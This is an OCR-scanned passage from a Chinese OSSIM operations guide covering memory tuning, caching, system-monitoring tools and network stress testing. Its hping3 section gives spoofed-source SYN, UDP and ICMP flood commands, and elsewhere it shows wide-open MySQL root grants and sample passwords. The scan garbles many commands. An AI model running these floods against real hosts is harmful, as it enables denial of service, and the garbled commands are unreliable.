一 来 大 部 分 CPU 的 计算 时 间 将 被 Snort 占用 , 与 此 同时 Snort 还 会 连接 数据 库 产生 大 量 日 志 从 
而 占用 磁盘 IO。 

(3) Squid， 实 现 squid 对 本 机 的 Apache 服务 实现 加 速 功 能 ， 我 们 可 以 在 
/etc/squid3/squid.conf 配置 文件 的 “Recommended minimum configuration ”推荐 最 小 化 配置 一 栏 
查找 具体 配置 。 

(4) Memcache， 当 数据 量 大 时 ， 利 用 memcached 可 以 缓存 MySQL. session 数据 、 临 时 
数据 以 减少 对 数据 库 的 写 操作 ， 但 它 消耗 内 存 也 很 大 。 

(5) Redis, Redis 与 memcache 一 样 都 是 基于 key/value 存储 ， 运 行 时 数据 存储 在 内 存 中 
插入 的 数据 越 多 时 消耗 内 存 越 大 ， 当 数据 继续 增加 ， 它 们 有 可 能 会 占用 大 量 的 内 存 。 

(6) Mongodb, 企业 版 OSSIM 中 又 增加 了 MongoDB 数据 库 , 它 使 用 内 存 映射 存储 引擎 ， 
会 占用 大 量 内 存 但 在 开源 版 OSSIM 中 并 不 含 Mongodb。 

CD LAMP, BR Linux 系统 本 身 的 内 存 消耗 外 ， 还 有 Apache. MySQL. PHP 及 模块 的 内 
存 消耗 。 

(8) OSSEC， 利 用 规则 进行 入 侵 检 测 分 析 时 ， 需 要 消耗 大 量 内 存 。 

(9) OpenVas， 在 进行 漏洞 扫描 时 会 加 载 漏洞 库 ， 这 样 会 消耗 大 量 内 存 。 

(10) Ntop， 在 监控 时 ， 在 读 取 流 量 到 Ntop 中 ，ntop 将 产生 大 量 主机 数据 ， 这 可 能 消耗 
大 量 服务 器 内 存 。 如 果 利 用 “q” 参 数 ， 将 ntop 产生 的 数据 包 转 储 为 文件 ， 在 这 一 过 程 中 ， 同 
样 也 消耗 内 存 。 

(1D Agent， 在 Sensor 中 包含 上 百 个 Agent 插件 ， 这 些 插件 都 消耗 着 大 量 内 存 。 

(12) Alienvault 框架 运行 同样 消耗 内 存 。 

(13) OSSIM 中 关联 引擎 的 聚合 模块 ， 在 处 理 复杂 报警 并 对 报警 事件 进行 聚合 处 理 时 ， 
会 进行 大 量 计算 ， 消 耗 内 存 以 及 CPU 资源 。 特 别 是 对 于 短 时 间 多 次 连续 攻击 ， 扫 描 引擎 的 报 
警 数目 更 多 , 基于 网 格 的 聚合 方法 , 系统 做 关联 分 析 任务 量 很 大 , 所 以 也 会 消耗 大 量 系统 资源 。 

- 旦 发 生 内 存 使 用 率 很 高 , 并 且 伴 随 交 换 分 区 利用 率 一 直人 攀升 的 情况 , 这 时 需要 给 系统 添 
加 内 存 。 

3. OSSIM 中 那些 数据 适合 利用 缓存 

对 于 OSSIM 应 用 中 ， 事 件 分 析 日 志 数 据 量 大 ， 而 且 变 化 非常 活跃 ， 而 系统 配置 数据 却 很 
少 变化 。 对 于 这 类 数据 , 我 们 是 否 有 必要 每 次 需要 的 时 候 都 到 数据 库 中 去 查询 ? 这 是 系统 设计 
为 将 变化 相对 较 少 的 配置 信息 (各 个 Sensor 需要 读 取 ) 对 应 的 活跃 数据 , 通过 应 用 层 的 Cache 
机 制 Cache 到 内 存 中 ， 对 性 能 的 提升 很 大 。 下 面 列举 说 明 ，OSSIM 中 有 那些 数据 ， 适 合 通过 
Cache 技术 ， 以 提高 系统 性 能 : 


(1) 准 实 时 的 统计 信息 数据 ;第 1 章 谈 到 OSSIM 中 有 大 量 准 实时 的 统计 数据 ， 实 际 上 
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就 是 基于 时 间 段 的 统计 数据 。 这 种 数据 不 会 实时 更 新 ,也 很 少 需要 增 量 更 新 ,只 有 当 达 到 重新 
Build 该 统计 数据 的 时 候 需要 做 一 次 全 量 更 新 操作 。 虽 然 这 种 数据 即使 通过 数据 库 来 读 取 效 率 
可 能 也 会 比较 高 , 但 是 执行 频率 很 高 之 后 ,同样 会 消耗 不 少 资源 。 既然 数据 库 服务 器 的 资源 非 
常 珍贵 ， 系 统 设计 为 放 在 应 用 相关 的 内 存 Cache 中 。 

(2) 在 Web UI 的 仪表 盘 和 SIEM 控制 台 有 大 量 个 性 化 定制 的 数据 ， 它 们 从 访问 频率 来 
看 相对 于 系统 整体 来 说 ， 也 占 了 很 大 的 比例 ， 利 用 Cache 可 以 加 速 访问 。 

(3) 系统 用 户 〈 特 别 是 管理 员 ) 的 基本 信息 ， 包 括 session， 用 户 的 基本 信息 在 应 用 系统 
中 的 访问 频率 极其 频繁 。 所 以 用 户 基 本 信息 的 Cache, 很 容易 让 整个 应 用 系统 的 性 能 出 现 一 个 
质 的 提升 。 

(4) OSSIM 各 种 配置 及 规则 数据 。 由 于 这 些 配 置信 息 变 动 的 频率 非常 低 , 访问 概率 又 很 
高 ， 所 以 非常 适合 存放 在 Cache 中 ， 例 如 ， 现 在 要 从 不 同 的 表 里 抽取 数据 以 显示 Top 10， 源 
人 码 可 参考 /usr/share/ossim/www/panel/nids.php 在 25 fT, TOP NID SEVENTS 描述 中 )， 由 于 
MySQL 对 客户 端 每 次 提交 的 SQL 不 管 是 相同 还 是 不 同 ， 都 需要 进行 完全 解析 ， 这 个 动作 主 
要 消耗 的 资源 是 数据 库 主 机 的 CPU，SQL 语句 的 解析 动作 在 整个 SQL 语句 执行 过 程 中 整体 
消耗 的 CPU 比例 较 多 。 


4. 检测 OSSIM 系统 整体 状态 的 命令 行 工具 


在 OSSIM Server 和 Sensor 中 都 有 一 段 基于 Python 的 脚本 ， 名 为 alienvault_doctor， 用 它 
来 检测 系统 状态 。 操 作 方法 如 下 : 


#alienvault_doctor 


在 OSSIM Server 下 的 执行 结果 如 图 5-16 所 示 。 


图 5-16 通过 alienvault_doctor 命令 显示 Server 系统 组 件 
在 Sensor 下 的 执行 结果 ， 如 图 5-17 Bros. 


lienvault:/var/ossec/bin# alienuault-doctor 
AlienVault Doctor version 4.15.1 (Meues) 


filienUault version: 4.15.1-FREE 
Softuare profiles: Sensor 


imme, let the Doctor haue a look at you.. 


图 5-17 通过 alienvault doctor 命令 显示 Sensor 系统 组 件 
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调用 这 一 脚本 的 配置 文件 在 /etc/ossim/doctor/ 目 录 下 ， 执 行 检测 脚本 在 plugins 目录 中 ， 大 
家 可 深入 研究 一 下 这 个 脚本 。 通 过 该 脚本 的 执行 ， 我 们 可 以 轻易 查看 当前 的 终端 是 OSSIM 
Server 还 是 Sensor。 

该 命令 可 以 显示 OSSIM 系统 各 组 件 的 状态 信息 。 可 以 检测 系统 磁盘 ， 网 络 接口 ， 服 务 器 
日 志 ， 数 据 库 的 状态 等 。 该 检测 功能 主要 是 调用 /usr/share/alienvault/doctor/ 目 录 下 的 .pyc 文件 
C.pyc 是 python 编译 后 的 二 进 制 文件 )。 

5. 图 形 化 监控 工具 软件 

接 下 来 为 大 家 介绍 几 款 图 形 化 监控 工具 。 

(1) nmon 工具 可 以 为 Linux 提供 监视 和 分 析 性 能 数据 的 功能 ， 能 查看 的 数据 包括 : 

CPU 使 用 率 

内 存 使 用 情况 

内 核 统计 信息 和 运行 队列 信息 

磁盘 VO 速度 、 传 输 和 读 / 写 比率 

文件 系统 中 的 可 用 空间 

磁盘 适配器 

网 络 IO 速度 、 传 输 和 读 / 写 比率 

页 面 空 间 

消耗 资源 最 多 的 进程 

Nmon 包括 字符 界面 和 图 形 化 界面 两 种 ， 字 符 界 面 如 图 5-18 左边 所 示 ， 安 装 方法 如 下 : 


#apt-get install nmon 


IET 


xosviewvega 


PROCS/MIN 1196 MHz 
LORD 2.0 ERA 


/NICE/ 41M 
CPUO 40X 


/WICE/: HLA 
CPU1 60% 


和 
VBUFF/ AHRP/ 
[I 


MEM 1.56 


RERD/H 
DISK378K * ze 


/LEVEL 
HLRN 69 


5 /FREE 
SHRP 


/IDLE 
PAGE 


/IDLE 
NET 
INTS 


INTS 


RVRIL/US| 
BTRY 83x iin 


图 5-18 nmon 和 xosview 
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与 nmon 功能 相似 的 工具 还 有 Glances, 它 也 是 在 命令 行 下 执行 的 监视 工具 ， 其 安装 方法 : 

#apt-get update 

#apt-get install python-pip build-essential python-dev 

#pip install glances 

(2) xosview 是 另 一 款 Linux 下 系统 监测 工具 ， 它 能 显示 如 系统 CPU 使 用 率 、 平均 负载 、 
内 存 使 用 、 交 换 空间 、 网 络 使 用 情况 。 如 图 5-18 右边 所 示 ， 安 装 方法 如 下 : 

#apt-get install xosview \\ 前 提 是 必须 由 X-window 环境 支持 。 

xosview 显示 了 诸如 CPU、 和 负载、 内存、 交换 分 区 和 网 络 使 用 情况 的 信息 。 如 果 有 完整 
的 Gnome 环境 ， 可 以 在 Applications 一 System tools 一 xosview 菜单 中 找到 启动 图 标 ， 命 令 行 启 
动 方法 : 


#xosview +net +page -ints 


| 在 xosview 中 具有 多 个 选项 ， 最 常用 的 是 “+Hnet” 监 视 网 卡 流量 、“+page” 显 示 页 面 交换 | 
t 频率 。 


如 果 首 次 启动 xosview， 系 统 提示 缺少 字体 ， 请 执行 以 下 命令 : 
#apt-get install xfonts-base \\ 必 选项 


重启 Gnome 后 xosview 即 可 使 用 。 


6. 监控 MySQL 利器 mytop 


mytop 是 OSSIM 系统 默认 提供 的 一 款 监 控 数 据 库 命 令 行 工 具 , 效果 比 phpmyadmin 稍 差 ， 
由 于 数据 库 权 限 设置 ， 默 认 远 程 查看 数据 库 功 能 被 禁止 ， 需 要 首先 按 以 下 方法 修改 。 


(1) 在 OSSIM Server 控 制 台 下 操作 


首先 输入 root 用 户 及 密码 , 然后 进入 AlienVault Setup 界面 , 我们 选择 “Jailbreak System", 
再 选 <Yes> 选 项 ， 进 入 完整 的 “# ”提示 符 。 

接 下 来 我 们 需要 知道 MySQL 的 root 用 户 密码 。 

#cat /etc/ossim/ossim setup.conf|grep pass 

该 命令 输出 第 二 行 红色 字体 显示 的 10 位 密码 就 是 我 们 要 找 的 内 容 。 

(2) 测试 

我 们 试 着 输入 如 下 命令 : 


#mytop -u root -p 密码 -h 127.0.0.1 -d alienvault 


见 到 如 图 5-19 所 示 的 界面 ， 表 示 操 作成 功 。 
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图 5-19 用 mytop 监控 MySQL 资源 
mytop 快捷 键 : 


€ s 设 定 更 新 时 间 

© p 暂停 画面 更 新 

@ q 退出 程序 

€ u 只 查看 某 个 使 用 者 的 线程 

€ o: 反 转 所 有 行 的 排列 顺序 

如 果 你 觉得 系统 默认 的 root 命令 很 复杂 ， 想 自己 指定 一 个 root 密码 ， 可 以 用 如 下 方法 : 
#0ssim-db 


e 在 修改 root 密码 之 前 ， 大 家 先 查看 系统 中 各 用 户 的 权限 情况 ， 如 图 5-20 所 示 。 


图 5-20 查看 MySQL 权限 


mysql>grant all privileges on *.* to 'root'&'localhost' identified by ‘alb2c3d4’ with grant option; 
mysql»flush privileges; 


(3) 通过 mytop 远程 连接 

工作 中 常常 需要 远程 登录 MySQL 主机 查看 数据 库 ， 远 程 连接 首要 任务 是 解决 数据 库 权 限 
问题 ， 假 设 我 们 需要 让 远程 主机 (这 人 台 主 机 的 IP 地址 为 192.168.11.40) 监控 OSSIM Server 中 
的 MySQL 数据 库 ， 我 们 还 是 在 OSSIM Server 端的 命令 行 下 输入 “ossim-db” 命 令 。 


#ossim-db 
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接着 进入 mysql> 提 示 符 下 ， 继 续 操 作 。 


mysql>grant all privileges on *.* to 'root'(0'192.168.11.40' identified by 'a1b2c3d4' with grant option; 


mysql>flush privileges; 
有 关 权 限 设置 的 总 结 : MySQL 赋予 用 户 权限 可 概括 为 : 
grant 权限 on 数据 库 对 象 to 用 户 @ 主 机 identified by “密码 ” 
修改 权限 以 后 ， 大 家 再 用 这 条 命令 查看 用 户 权限 ， 如 图 5-21 所 示 。 


图 5-21 检查 修改 权限 
到 目前 为 止 ， 远 端 (192.168.11.40) 主 机 可 以 用 mytop 监 


监控 到 OSSIM Server 中 MySQL 
数据 库 吗 ? 别 忘 了 还 有 iptables 服务 。 


(4) 使 用 技巧 


如 果 想 经 常 监控 某 个 数据 库 , 不 用 每 次 都 输入 很 多 参数 , 可 以 将 这 些 经 常 输入 的 参数 先 输 
入 到 文件 ， 3 mytop 会 自动 读 取 。 

例如 当前 目录 为 /root， 首 先 在 当前 目录 下 新 建 “.mytop” 文 件 ， 内 容 如 下 : 

#vi .mytop 


user=root 


pass=fHCtNi4dKN \\ 上 面 获取 的 密码 ， 也 可 以 自己 指定 
host=127.0.0.1 \\ 因 为 这 里 我 们 在 OSSIM Server 本 机 上 实验 


db-alienvault 
delay-10 
port-3306 
resolve-0 


保存 退出 后 ， 在 命令 行 下 直接 输入 mytop 指令 就 能 监控 alienvault 的 状态 
(5) 危险 的 设置 


有 些 读 者 为 了 访问 te 权限 大 门 敞 开 ， 这 样 做 非常 危险 。 将 第 3 步 中 
192.168.11.40 这 个 主机 IP 用 “%” 代 奉 ， 表 示 任 何 主机 都 可 以 连接 数据 库 ， 操 作 如 下 : 


mysql»grant all privileges on *.* to 'root'G'$' identified by 'alb2c3d4' with 
grant option; 
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(6) 故障 排除 实例 


使 用 ossim-db 时 出 现 “Access denied for user 'root'G)'localhost' Cusing password:NO) ”提示 ， 
如 何 处 理 ? 在 图 5-22 中 给 出 了 此 类 故障 排除 的 步骤 。 


server1:/usr/share/ossim/include/upgrades# ossin-db 
ERROR 1045 (28000): Access denied for user 'root'G'localhost' (using password: YES) 
serverl:/usr/share/ossim/include/upgrades& mysqldump --all-databases »/tmp/12 


serverl:-/Desktopé mysqld safe --user-mysql --skip-grant-tables --skip-networking & 
[1] 29590 

serverl:-/Desktopf 140119 19:33:51 mysqld safe Logging to syslog. 

140119 19:33:51 nysqld safe Starting mysqld daemon with databases from /var/lib/mysql 


serverl:-/Desktop& mysql -u root mysql - 
Reading table information for completion of table and COLUNT TI3 
You can turn off this feature to get a quicker startup with -A 
Welcome to the MySQL monitor. Commands end with ; or Ag. 


Your MySQL connection id is 2 
Server version: 5.1.61-2-dotdeb.O (Debian) 


server1:-/Desktop& ossim-db 

ERROR 1045 (28000): Access denied for user 'root'G'localhost' (using password: 
server1:-/Desktop£ /etc/init.d/mysql stop 

* Stopping MySQL database server mysqld ok 


Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved. 


Oracle is a registered trademark of Oracle Corporation and/or its 
affiliates. Other names may be trademarks of their respective 
owners. 


Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. 


mysql» UPDATE user SET passwordePASSWORD('1234567') where USER-'root'; 
Query OK, 4 rows affected (0.00 sec) 
Rows matched: 4 Changed: 4 Warnings: 0 


mysql> FLUSH PRIVILEGES; 
Query OK, 0 rows affected (0.00 sec) 


mysql» quit 


图 5-22 设置 MySQL 权限 
7. 监控 Linux 系统 资源 和 进程 的 工具 


atop 是 一 款 用 于 监控 Linux 系统 资源 与 进程 的 工具 ， 它 以 一 定 的 频率 记录 系统 的 运行 状 
态 ， 所 采集 的 数据 包含 系统 资源 CPU、 内 存 、 磁 盘 和 网 络 ) 使 用 情况 和 进程 运行 情况 ， 并 能 
以 日 志文 件 的 方式 保存 在 磁盘 中 。 使 用 方法 如 下 : 


fatop 

8. 如 何 找 出 最 消耗 内 存 的 进程 ( smem ) 

第 一 种 方法 我 们 使 用 ps 命令 查看 。 

# Ps auxw|head -1;ps auxw|sort -rn -k4|head -10 

第 二 种 使 用 smem 工具 ， 它 的 安装 命令 为 apt-get install smem。 用 法 为 : 

# smem 

9. 如 何 对 OSSIM 系统 目录 大 小 进行 排序 

我 们 知道 使 用 du 命令 查看 磁盘 目录 及 文件 的 使 用 情况 ， 这 里 介绍 一 款 磁 盘 目 录 占 用 空间 
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开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


情况 的 工具 ncdu。ncdu 命令 是 对 传统 du 命令 功能 上 的 增强 ， 不 需要 像 du 那样 输入 大 量 的 命 
令 〈 和 它 功能 相当 的 命令 有 :du -sh /*)， 就 可 以 计算 文件 及 目录 大 小 并 可 以 按照 文件 大 小 或 文 
件 名 进行 排序 。 它 有 点 类 似 于 Gnome 环境 下 的 Disk Usage Analyzer. 

安装 : apt-get install ncdu， 使 用 :“#ncdu /“， 运 行 效果 如 图 5-23 所 示 。 


/var 
110.94B /lib 
76.3MiB /etc 
18.8MiB /boot 
5.8MiB /bin 
4.3MiB /sbin 
1.3MiB /root 
164.0kiB /dev 
56.0kiB /tmp 
44.0kiB /media 
e 16.0kiB /Lost+found 
8.0kiB /home 
4.0kiB /mt 
4.0kiB /opt 
/selinux 
iB /srv 
B /proc 
B /sys 
B  initrd.img 
B  vmlinuz 


? 0 09 
Bm 
e 
四 


e 
[d 


ent size: 128.0T1iB Items: 262091 


5-23 用 mcdu 列 目录 


n : 按 文件 名 进行 排序 。 
s: 按 文件 大 小 进行 排序 。 
r: 重新 统计 当前 文件 夹 大 小 。 
g: 用 # 或 百分比 显示 各 文件 /目录 的 大 小 所 占 的 百分比 。 
从 这 个 工具 我 们 能 方便 地 分 析出 ， 初 始 情况 下 的 OSSIM 系统 ，/var/、/usr 目录 容量 占据 
整个 系统 空间 的 80%， 为 我 们 手动 分 区 时 提供 了 参考 依据 。 


10. OSSIM 的 流量 监控 工具 iftop 


OSSIM 系统 中 可 以 使 用 top 查看 系统 资源 、 进 程 、 内 存 占用 等 信息 ， 查 看 网 络 状态 可 以 
使 用 netstat, nmap 等 工具 。 若 要 查看 实时 的 网 络 流量 ， 监 控 TCP/IP 连接 等 ， 则 可 以 使 用 iftop 
命令 ， 其 运行 情况 如 图 5-24 所 示 。 在 OSSIM 中 iftop 安装 方法 为 : 

#apt-get install iftop 

#iftop 
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5-24 iftop 运行 情况 

界面 上 面 显示 类 似 刻度 尺 。 中 间 的 “<=”“=>” 这 两 个 左右 箭头 ， 表 示 流 量 方向 。iftop 
界面 上 一 些 栏目 信息 说 明 如 下 。 

e TX: 发 送 流量 。 
RX: 接收 流量 。 
TOTAL: 总 流量 。 
cumm: 从 运行 iftop 起 到 目前 的 总 流量 。 
peak: 流量 峰值 。 
rates: 分 别 表 示 过 去 2s、10s、40s 的 平均 流量 。 


用 的 参数 : 


常 
e i: 设 定 监 测 的 网 卡 ， 如 #iftop -i ethl. 

€ n: 使 host 信息 默认 直接 都 显示 IP， 如 #ftop -n。 
e. 

e. 


-N: 使 端口 信息 默认 直接 都 显示 端口 号 ， 如 # iftop -N。 

F: 显示 特定 网 段 的 进出 流量 ， 如 节 ftop -F 10.10.1.0/24 ， 或 # iftop -F 
10.10.1.0/255.255.255.0, 

-h: 显示 帮助 信息 。 

-p: 使 用 该 参数 后 ， 中 间 的 列表 显示 的 本 地 主机 信息 ， 出 现 了 本 机 以 外 的 IP 信息 。 

: 使 流量 图 形 条 默认 显示 。 

-f 过 滤 计 算 包 。 

-P: 使 主机 信息 及 端口 信息 默认 显示 。 


[2 e@ @ 
] 
o 
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© -m, 设置 界面 最 上 边 的 刻度 的 最 大 值 ， 刻 度 分 五 段 显示 ， 如 # iftop -m 100M。 

11. 如 何 利 用 Apache 自 带 工具 ab 测试 OSSIM 响应 速度 

ab (apache benchmark) 是 Apache 自 带 的 性 能 测试 工具 ， 下 面 我 们 用 ab 来 测试 OSSIM 首 
〖 ， 操 作 效果 如 图 5-25 所 示 。 


) .114/0ssim, 


concurrent r 


图 5-25 利用 ab 对 OSSIM Web 进行 测试 


#ab -A auth-admin:1234567 -c 100 -n 100 
https://192.168.120.78/0ssim/session/login.php 


€ -A: 认证 用 户 名 和 密码 。 

€ n: 在 测试 会 话 中 所 执行 的 请 求 个 数 。 默 认 时 ， 仅 执行 一 个 请 求 。 

€ c: 一 次 产生 的 请 求 个 数 。 默 认 是 一 次 一 个 。 

这 个 表示 同时 处 理 100 个 请 求 并 运行 100 次 login.php 文件 ，Web UI 用 户 名 和 密码 分 别 是 
admin, 1234567. 

12. 如 何 详细 了 解 OSSIM 系统 进程 的 网 络 带 宽 占 用 情况 

在 OSSIM 系统 性 能 调 优 的 时 候 ， 经 常 需要 知道 系统 中 每 个 进程 占用 带宽 的 情况 ，OSSIM 


下 安装 非常 方便 : 
#apt-get install nethogs \\* 安 装 nethogs 
#nethogs eth0 \\* 使 用 nethogs 
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nethogs 最 新 版 本 为 0.8.0， 有 别 于 其 他 流量 监控 工具 〈 例 如 iftop), nethogs 可 以 细 化 到 显 
示 系 统 中 每 个 进程 的 带宽 占用 情况 ， 这 样 就 能 更 直观 地 获取 网 络 使 用 情况 ， 例 如 查看 到 底 是 哪 
个 进程 占用 了 大 量 的 带宽 ， 或 者 是 哪个 IP 对 服务 器 进行 了 访问 。 它 支持 IPv4 和 IPv6 协议 、 
支持 本 地 网 卡 及 PPP 连接 。 

除 此 之 外 ， 在 OSSIM 下 还 可 以 通过 上 面 的 方式 安装 诸如 iftop, bwm-ng. 、ipfm 、 
speedometer, pktstat, nload, vnstat, iptraf, ifstat, mtr, nethogs 等 命令 行 下 的 网 卡 流量 监控 


LR. 
13. 为 OSSIM 系统 进行 压力 测试 tepreplay 


这 里 以 tepreplay 工具 为 例 讲 解 如 何 进 行 测试 ， 例 如 ， 当 前 目录 下 有 123.pcap 抓 取 的 数据 
包 文 件 ， 重 放 aurora.pcap 包 ， 如 图 5-26 所 示 。 


alienvault:™# tcpreplay intf1=ethO aurora.pcap 
sending out ethO 
processing file: aurora.pcap 


25 packets (14120 bytes) sent in 2.22 seconds 
2d : 6360. 4 bps, 0.05 Mbps, 11.26 pps 
lalienuault: 


图 5-26 重 放 aurora.pcap 包 
#tcpreplay --intfl-eth0 123.pcap 
tepreplay 会 用 前 面 抓 到 的 以 libpcap 格式 存储 的 数据 包 来 测试 各 种 网 络 设 备 ， 包 括 重 新 回 
放 Demo Virus 包 ， 有 关 测 试用 worm pcap 数据 包 ， 可 到 作者 博客 下 载 。 
--intfl=eth0 是 指 主 接口 是 eth0， 客 户 机 一 服务 器 的 数据 包 通 过 此 接口 发 出 。 


#tcpreplay -1 10 -p 1000 -i eth0 123.pcap 


-1 参数 代表 循环 多 少 次 ，-p 参数 代表 每 秒 发 多 少 个 包 ，-i 代表 从 那个 网 卡 发 出 。 

#tcpreplay -1 10 -p 1000 -i eth0 *.pcap \\ 发 送 当前 目录 下 所 有 pcap 包 

#tcpreplay -t -i eth0 *.pcap \\-t 参数 表示 全 速 --topspeed， 全 速 回放 当前 目录 下 所 
有 pcap 包 。 

如 果 目 录 下 有 多 个 pcap 文件 需要 合并 成 一 个 pcap 文件 ， 可 以 使 用 如 下 命令 : 

#mergecap -w output.pcap inputl.pcap input2.pcap 

需要 说 明 ， 对 于 典型 数据 包 最 为 运 维 人 员 需 要 了 解 ， 可 以 到 网 址 
https://wiki.wireshark.org/SampleCaptures/， 或 者 http://www.netresec.com/?page-PcapFiles 下 载 
Demo 数据 包 ， 在 本 书 最 后 一 章 中 ， 将 会 为 大 家 讲解 利用 一 些 典 型 的 蠕虫 病毒 爆发 时 的 数据 包 
进行 分 析 的 方法 。 

当然 你 也 可 以 通过 suricata 读 入 pcap 包 ， 方 法 如 下 : 


alienvault:~#suricata -c /etc/suricata/suricata.yaml -r tmp3.pcap 


€ c 这 个 选项 是 最 重要 的 选项 。 在 -c 之 后 ， 要 输入 suricata.yaml 文件 所 在 的 路 径 。 
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€ r: 在 这 个 选项 之 后 ， 你 可 以 输入 记录 数据 的 抓 包 文件 的 路 径 和 文件 名 。 可 以 在 
pcap/offline 模式 下 ， 在 这 个 文件 中 查看 包 数 据 。 
14. 压力 测试 工具 Tsung 
Tsung 是 一 个 非常 好 用 的 压力 测试 软件 ， 它 基于 Erlang 语言 ， 支 持 多 种 协议 ， 如 xmpp, 
http 等 。 使 用 它 可 以 测试 OSSIM 中 消息 服务 器 能 承受 多 大 压力 。 在 OSSIM 系统 中 安装 Tsung 
非常 容易 ， 其 安装 效果 如 图 5-27 所 示 。 


图 5-27 Tsung 安装 和 测试 效果 


Tf tsung 1.5.1 1 all.deb 安装 完成 后 ， 开 始 编写 tsung.xml 配置 文件 ， 其 实 不 用 你 写 ， 只 要 
Tf/usr/share/doc/tsung/examples 目录 下 的 实例 根据 需要 进行 少量 修改 即 可 使 用 。 

开始 运行 Tsung : 

#tsung -f youfile.xml start 

程序 运行 后 数据 保存 在 ~/.tsung/log 目录 下 。 

15. hping3 使 用 的 实例 

大 家 知道 hping3 是 检测 服务 器 防御 性 能 的 工具 ， 它 不 但 能 测试 出 服务 器 所 承受 的 网 络 压 
力 ， 而 且 还 能 对 网 络 中 的 端口 进行 扫描 ， 同 时 它 还 是 一 种 DDoS 软件 ， 能 够 产生 DDoS 攻击 ， 
因而 用 户 在 使 用 的 过 程 中 不 得 用 于 非法 用 途 。 

在 OSSIM 系统 中 安装 hping3 的 方法 : 

#apt-get install hping3 

安装 完毕 之 后 ， 下 面 看 几 个 实例 : 

(1) 使 用 hping3 进行 SYN Flood 模拟 : 


#hping3 -q -n -a 10.0.0.1 -S -s 53 --keep -p 22 --flood 192.168.0.2 


参数 说 明 : 
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-a: 参数 可 以 进行 源 IP 地 址 的 伪造 。 

-S: 表示 源 端口 。 

: 表示 设置 SYN 标识 。 

-p: 22 表示 设置 数据 包 的 目标 端口 为 22。 


e e @ o 
] 
an 


E7 10.0.0.1 为 源 地 址 、192.168.0.2 为 目标 地 址 ， 停 止 hping3 程序 按 CtrltC。 | 


(2) SYN flood 测试 : 
#hping3 -q -n -a 10.0.0.1 -S -s 53 --keep -p 22 --flood 192.168.0.2 


10.0.0.1 为 源 地 址 ，192.168.0.2 为 目标 地 址 。 

构造 源 地 址 为 192.168.10.99， 并 使 用 1000 微 秒 的 间隔 发 送 各 个 SYN 包 。 

#hping3 -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000 

参数 说 明 : 

€ -LIeth0: 指定 使 用 eth0 端口 。 

€ -c-count 指定 收发 数据 包 的 个 数 。 

€ .i-interval: 指定 发 包间 隔 为 多 少 毫秒 ， 如 -i m10 表示 发 包间 隔 为 10 毫秒 、-i ul 表 
示 每 个 数据 包 发 送 间 隔 为 1 微妙 。 

(3) 进行 SARFU 扫描 的 例子 : 

#hping3 -q -n -a 10.0.0.1 -SARFU -p 22 --flood 192.168.0.2 

(4) 利用 hping3 进行 UDP Flood 的 例子 : 

#hping3 -q -n -a 10.0.0.1 --udp -s 53 --keep -p 68 --flood 192.168.0.2 

(5) ICMP flood 的 例子 : 

*hping3 -q -n -a 10.0.0.1 --id 0 --icmp -d 56 --flood 192.168.0.2 

16. OSSIM BS TCP 扫描 工具 

(1) Knocker 


Knocker 是 一 个 简单 易 用 的 TCP 端口 扫描 工具 , 采用 C 语言 编写 , 用 于 分 析 主 机 上 运行 


的 服务 。 


安装 : 
#apt-get install libio-socket-ssl-perl 
#apt-get install knocker 


使 用 : 
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#knocker -H 192.168.150.10 -SP 1 -EP 10000 


© -H: 目标 主机 。 

€ -SP: 开始 端口 。 

© EP: 结束 端口 。 

(2) sendip 

由 于 在 测试 IDS 中 经 常 需要 构造 各 种 TCP、UDP 和 不 同 大 小 的 包 ，sendip 为 我 们 提供 该 
功能 ， 其 运行 效果 如 图 5-28 所 示 ， 安 装 方法 如 下 : 

#apt-get install sendip 


#sendip -v -p ipv4 -is 192.168.120.78 -id 192.168.120.78 -p udp -us 8000 -ud 
4000 192.168.120.78 -d dfsdfasdf 


i/tmptt -v - - 192.168.120.78 -id 192.168.120.78 - L 000 -ud 4000 19 


Initiali 
Initiali 


图 5-28 sendip 运行 效果 
上 面 结果 说 明 : 发 送 源 地 址 为 192.168.120.78， 源 端口 为 8000 的 udp 包 ， 目 的 地 址 为 
192.168.120.78， 目 的 端口 为 4000 设备 上 ， 数 据 包 的 内 容 是 “dfsdfasdf”， 如 果 要 直接 引用 一 个 
文件 的 内 容 的 话 ， 可 以 使 用 -tf 参数， 后 面 写 文件 的 路 径 ， 例 如 : 


# sendip -v -p ipv4 -is 192.168.96.7 -id 192.168.150.115 -p udp -us 8000 -ud 
4000 192.168.150.115 -f /tmp/123.1og 


举例 1: 
下 面 这 段 Shell 脚本 很 容易 ， 脚 本 内 容 如 图 5-29 所 示 。 


m1 -if 0 -iy 8 


图 5-29 一 段 包含 sendip 的 脚本 
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sendip 可 以 发 送 NTP、BGP、RIP、TCP、UDP、ICMP、IPv4 和 IPv6 等 各 种 格式 的 数据 
包 ，sendip 本 身 是 以 模块 的 方式 发 送 各 种 协议 的 数据 包 ， 用 “-p” 参 数 指定 协议 类 型 ， 要 发 送 
每 种 协议 的 数据 包 ， 必 须 对 该 协议 的 数据 包 格式 有 一 定 的 了 解 。 通 常 发 送 TCP/UDP/ICMP 数 
据 包 时 ， 都 必须 以 卫 包 进 行 封装 ， 然 后 才 可 以 发 出 去 。 

举例 2: 


$sondip =v -d r64 -p ipv4 -iv 4 -ih 5 -il 128 -is 10.0.0.1 -id 10.0.0.2 -p tcp 
zte 1379 -td 23 =tt $ 10.0.02 


-v: 运行 时 输出 详细 运行 信息 ， 如 不 指定 ， 运 行 时 将 不 输出 信息 。 

-dr64: 用 64 字 节 的 随机 数值 填充 IP 包 中 的 数据 段 。 

-pipv4: 指定 协议 类 型 为 卫 协议 (IP 协议 有 自己 的 相应 参数 ， 以 i 开头 ) 。 

-iv 4: 协议 版 本 为 4， 即 IPV4。 

-ih 5: 指定 IP 头 的 长 度 为 5x4=20 $$. 

-il 128: 指定 IP 包 的 总 长 度 为 128 字 节 。 

-is 10.0.0.1: 指定 IP 包 的 源 地址 。 

-id 10.0.0.2: 指定 IP 包 的 目的 地 址 。 

-ptcp: 指定 IP 包 中 封装 的 包 的 协议 类 型 (TCP 协议 有 自己 的 相应 参数 ， 以 t 开头 ) 
-ts 1379: 指定 TCP 包 的 源 端口 1379 

-td 23: 指定 TCP 包 的 目的 端口 为 23 

-tt8: 指定 TCP 包 的 偏 移 量 即 TCP 头 的 长 度 ， 没 有 TCP 选项 时 为 5， 即 20 字 节 ， 
